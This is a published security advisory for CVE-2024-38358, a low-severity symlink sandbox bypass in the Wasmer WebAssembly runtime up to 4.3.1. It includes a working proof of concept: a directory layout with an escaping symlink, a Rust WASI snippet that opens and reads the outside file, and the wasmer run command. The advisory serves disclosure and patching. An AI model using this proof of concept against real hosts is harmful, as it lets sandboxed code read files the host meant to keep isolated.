GHSA-55f3-3qvg-8pv5

Source

https://github.com/advisories/GHSA-55f3-3qvg-8pv5

Import Source

https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/06/GHSA-55f3-3qvg-8pv5/GHSA-55f3-3qvg-8pv5.json

JSON Data

https://api.osv.dev/v1/vulns/GHSA-55f3-3qvg-8pv5

Aliases

CVE-2024-38358

Related

Published

2024-06-07T19:40:00Z

Modified

2024-06-20T14:14:38Z

Severity

2.9 (Low) CVSS_V3 - CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N CVSS Calculator

Summary

Symlink bypasses filesystem sandbox

Details

Summary

If the preopened directory has a symlink pointing outside, WASI programs can traverse the symlink and access host filesystem if the caller sets both oflags::creat and rights::fd_write. Programs can also crash the runtime by creating a symlink pointing outside with path_symlink and path_opening the link.

Details

PoC

Setup a filesystem as follows.

.
├── outside.file
└── preopen
    └── dir
        └── file -> ../../outside.file

Compile this Rust snippet with wasi v0.11 (for the preview1 API).

fn main() {
    unsafe {
        let filefd = wasi::path_open(
            5,
            wasi::LOOKUPFLAGS_SYMLINK_FOLLOW,
            "app/dir/file",
            wasi::OFLAGS_CREAT,
            wasi::RIGHTS_FD_READ | wasi::RIGHTS_FD_WRITE,
            0,
            0,
        )
        .unwrap();
        eprintln!("filefd: {filefd}");

        let mut buf = [0u8; 10];
        let iovs = [wasi::Iovec {
            buf: buf.as_mut_ptr(),
            buf_len: buf.len(),
        }];

        let read = wasi::fd_read(filefd, &iovs).unwrap();

        eprintln!("read {read}: {}", String::from_utf8_lossy(&buf));
    }
}

Run the compiled binary with Wasmer preopening preopen/:

wasmer run --mapdir /app:preopen a.wasm

This should not print the contents of the outside.file. Other runtimes like Wasmtime can successfully block this call. But Wasmer prints the contents of the file.

Database specific

{
    "nvd_published_at": "2024-06-19T20:15:11Z",
    "cwe_ids": [
        "CWE-22"
    ],
    "severity": "LOW",
    "github_reviewed": true,
    "github_reviewed_at": "2024-06-07T19:40:00Z"
}

References

Affected packages

crates.io / wasmer

Package

Name: wasmer; View open source insights on deps.dev
Purl: pkg:cargo/wasmer

Affected ranges

Type: SEMVER
Events: Introduced

0Unknown introduced version / All previous versions are affected

Last affected

4.3.1